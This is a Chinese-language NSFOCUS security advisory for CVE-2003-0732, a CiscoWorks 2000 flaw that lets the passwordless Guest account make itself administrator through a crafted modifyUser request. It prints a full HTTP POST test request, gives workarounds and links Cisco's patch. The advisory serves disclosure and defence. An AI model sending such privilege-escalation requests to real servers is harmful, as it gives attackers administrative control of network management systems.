安全研究

安全漏洞
CiscoWorks 2000权限提升漏洞

发布日期:2003-08-13
更新日期:2003-08-15

受影响系统:
Cisco CiscoWorks 2000
描述:
CVE(CAN) ID: CVE-2003-0732

CiscoWorks 2000是一款Cisco发布的综合网络管理系列产品。

CiscoWorks 2000不正确处理用户提交的特殊URL,远程攻击者可以利用这个漏洞获得管理员权限访问CiscoWorks 2000服务器。

Portcullis发现使用默认没有设置密码的Guest帐户,可以提升Guest用户的权限为管理员权限。当提交更改用户帐户时,HTML会在下面的字符串中显示用户信息:

cmd=modifyUser&name=guest&pwd=cGFzc3dvcmQ%3D&email=test%0test.com&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0

从下面信息可以获得更改用户权限级别是从0到F之间,而F是管理员权限的代码。因此攻击者可以提交特殊的POST请求,获得管理员权限,完成一些如调度控制,软件升级,增加或删除设备,增加或删除帐户的管理员操作。

<*来源:Portcullis Security Advisory (Omicron@portcullis-security.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106079235206611&w=2
        http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Portcullis Security Advisory (Omicron@portcullis-security.com)提供了如下测试方法:

POST /CSCOnm/servlet/com.cisco.nm.cmf.servlet.CsAuthServlet HTTP/1.0
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 10.10.10.1:1741
Content-Length: 114
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: jrunsessionid=1057059156201223367


cmd=modifyUser&name=guest&pwd=&email=&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 管理Guest用户帐户,并限制只有可信用户能访问CiscoWorks服务器。

厂商补丁:

Cisco
-----
Cisco已经为此发布了一个安全公告(cisco-sa-20030813-cmf)以及相应补丁:
cisco-sa-20030813-cmf:CiscoWorks Application Vulnerabilities
链接:http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml

所有漏洞在CiscoWorks Common Services 2.2中已经得到解决。

CMF 2.0和2.1的补丁在2003 8月底公布。

您可以从Cisco网站的软件中心下载升级程序:

http://tools.cisco.com/gct/Upgrade/jsp/index.jsp(只限注册用户)

浏览次数:3796
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障